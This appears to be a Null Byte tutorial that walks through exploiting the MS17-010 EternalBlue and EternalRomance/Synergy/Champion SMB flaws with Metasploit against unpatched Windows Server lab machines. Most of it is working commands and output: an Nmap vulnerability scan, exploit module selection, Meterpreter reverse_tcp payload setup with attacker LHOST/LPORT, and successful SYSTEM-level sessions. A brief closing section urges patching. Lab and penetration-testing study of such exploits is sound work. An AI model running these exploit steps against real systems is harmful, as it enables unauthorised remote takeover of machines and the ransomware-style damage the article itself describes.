Particular vulnerabilities and exploits come along and make headlines with their catchy names and impressive potential for damage. EternalBlue is one of those exploits. Originally tied to the NSA, this zero-day exploited a flaw in the SMB protocol, affecting many Windows machines and wreaking havoc everywhere. Here, we will use EternalBlue to exploit SMB via Metasploit.
What Is EternalBlue?
EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the Tailored Access Operations unit of the NSA.
EternalBlue, also known as MS17-010, is a vulnerability in Microsoft's Server Message Block (SMB) protocol. SMB allows systems to share access to files, printers, and other resources on the network. The vulnerability is allowed to occur because earlier versions of SMB contain a flaw that lets an attacker establish a null session connection via anonymous login. An attacker can then send malformed packets and ultimately execute arbitrary commands on the target.
EternalBlue was mostly responsible for the WannaCry, NotPetya, and BadRabbit ransomware outbreaks, as well as the EternalRocks worm.
Option 1: Exploit EternalBlue with Metasploit
We'll be using an unpatched copy of Windows Server 2008 R2 as the target for the first section of this tutorial. An evaluation copy can be downloaded from Microsoft so that you can better follow along.
Step 1: Find a Module to Use
The first thing we need to do is open up the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not running already, followed by msfconsole.
service postgresql start
msfconsole
Next, use the search command within Metasploit to locate a suitable module to use.
search eternalblue
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010. It's always a good idea to perform the necessary recon like this. Otherwise, you could end up wasting a lot of time if the target isn't even vulnerable.
Once we have determined that our target is indeed vulnerable to EternalBlue, we can use the following exploit module from the search we just did.
use exploit/windows/smb/ms17_010_eternalblue
You'll know you're good if you see the "exploit(windows/smb/ms17_010_eternalblue)" prompt.
Step 2: Run the Module
We can take a look at the current settings with the options command.
options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
First, we need to specify the IP address of the target.
set rhosts 10.10.0.101
rhosts => 10.10.0.101
Next, we can load the trusty reverse_tcp shell as the payload.
set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
Finally, set the listening host to the IP address of our local machine.
set lhost 10.10.0.1
lhost => 10.10.0.1
And the listening port to a suitable number.
set lport 4321
lport => 4321
That should be everything, so the only thing left to do is launch the exploit. Use the run command to fire it off.
run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.101:445 - Connecting to target for exploitation.
[+] 10.10.0.101:445 - Connection established for exploitation.
[+] 10.10.0.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.0.101:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.10.0.101:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030 6b 20 31 k 1
[+] 10.10.0.101:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.101:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.101:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.101:445 - Starting non-paged pool grooming
[+] 10.10.0.101:445 - Sending SMBv2 buffers
[+] 10.10.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.101:445 - Sending final SMBv2 buffers.
[*] 10.10.0.101:445 - Sending last fragment of exploit packet!
[*] 10.10.0.101:445 - Receiving response from exploit packet
[+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.101:445 - Sending egg to corrupted connection.
[*] 10.10.0.101:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.101
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
We see a few things happen here, like the SMB connection being established and the exploit packet being sent. At last, we see a "WIN" and a Meterpreter session is opened. Sometimes, this exploit will not complete successfully the first time, so if it doesn't just try again and it should go through.
Step 3: Verify the Target Is Compromised
We can verify we have compromised the target by running commands such as sysinfo to obtain operating system information.
sysinfo
Computer : S02
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : DLAB
Logged On Users : 2
Meterpreter : x64/windows
And getuid to get the current username.
getuid
Server username: NT AUTHORITY\SYSTEM
This exploit doesn't work very well on newer systems, and in some cases, it can crash the target machine. Next, we will explore a similar exploit that is a little more reliable, but just as deadly.
Option 2: EternalRomance / EternalSynergy / EternalChampion
As if EternalBlue wasn't devastating enough, three more similar exploits were developed after it. EternalRomance and EternalSynergy exploit a type of confusion (CVE-2017-0143), while EternalChampion and EternalSynergy exploit a race condition (CVE-2017-0146).
These were combined into a single Metasploit module that also uses the classic psexec payload. It's considered more reliable than EternalBlue, less likely to crash the target, and works on all recent unpatched versions of Windows, up to Server 2016 and Windows 10.
The only caveat is this exploit requires a named pipe. Named pipes provide a method for running processes to communicate with one another, usually appearing as a file for other processes to attach to. The Metasploit module automatically checks for named pipes, making it pretty straightforward to use as long as a named pipe is present on the target.
Step 1: Find a Vulnerable Target
We can use Nmap as an alternative to the Metasploit scanner to discover if a target is vulnerable to EternalBlue. The Nmap Scripting Engine is a powerful feature of the core tool that allows all kinds of scripts to run against a target.
Here, we'll be using the smb-vuln-ms17-010 script to check for the vulnerability. Our target will be an unpatched copy of Windows Server 2016 Datacenter edition. Evaluation copies can be downloaded from Microsoft so you can follow along if you want.
We can specify a single script to run with the --script option, along with the -v flag for verbosity and our target's IP address. First, change directories in case you're still running Metasploit.
cd
nmap --script smb-vuln-ms17-010 -v 10.10.0.100
Nmap will start running and shouldn't take too long since we are only running one script. At the bottom of the output, we'll find the results.
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 11:05 CDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05
...
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
NSE: Script Post-scanning.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
Raw packets sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB)
We can see it lists the target as vulnerable, along with additional information like risk factors and links to the CVE.
Step 2: Find a Module to Use
Now that we know the target is vulnerable, we can go back to Metasploit and search for an appropriate exploit.
msfconsole
search eternalromance
Matching Modules
================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
And load the module in Metasploit with the use command.
use exploit/windows/smb/ms17_010_psexec
You'll know you're good if you see the "exploit(windows/smb/ms17_010_psexec)" prompt.
Step 3: Run the Module
Let's take a look at our options:
options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
It looks like this exploit uses a list of named pipes to check and connects to a share. We can leave all this as default for now, but we need to set the remote host.
set rhosts 10.10.0.100
rhosts => 10.10.0.100
And the reverse shell payload.
set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
And our local host.
set lhost 10.10.0.1
lhost => 10.10.0.1
And local port.
set lport 4321
lport => 4321
We should be good to go now. Type run to launch the exploit.
run
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - Built a write-what-where primitive...
[+] 10.10.0.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.0.100:445 - Selecting PowerShell target
[*] 10.10.0.100:445 - Executing the payload...
[+] 10.10.0.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 10.10.0.100
[*] Meterpreter session 2 opened (10.10.0.1:4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500
We can see the payload successfully execute, and we end up with a Meterpreter session.
Step 4: Verify the Target Is Compromised
Again, we can verify we've compromised the system with commands like sysinfo.
sysinfo
Computer : DC01
OS : Windows 2016 (Build 14393).
Architecture : x64
System Language : en_US
Domain : DLAB
Logged On Users : 4
Meterpreter : x64/windows
And getuid.
getuid
Server username: NT AUTHORITY\SYSTEM
Prevention & Current Status
Despite all the damage EternalBlue has caused, there is one reliable way to prevent these types of exploits: patch your systems! At this point, nearly two years since these vulnerabilities were disclosed, there is really no excuse to have unpatched operating systems.
EternalBlue continues to be a problem, though, and even though the consequences are dire, unfortunately, some organizations will still be running unpatched systems. That, combined with pirated versions of Windows, makes EternalBlue a significant threat to this day.
Cryptojacking, which uses a victim's computer to secretly mine cryptocurrency, is another threat vector that uses EternalBlue to leverage attacks. WannaMine was one of these outbreaks that hijacked computers around the world in 2018.
Wrapping Up
Today, we learned about EternalBlue and how to exploit it using Metasploit. We also learned about an exploit similar to EB that is more reliable and works on more systems. In the next tutorial, we will dig a little deeper and learn how to exploit EternalBlue manually, which is much more satisfying in the end.
- Follow Null Byte on Twitter, Flipboard, and YouTube
- Sign up for Null Byte's weekly newsletter
- Follow WonderHowTo on Facebook, Twitter, Pinterest, and Flipboard
Cover image by Fancycrave/Pexels; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!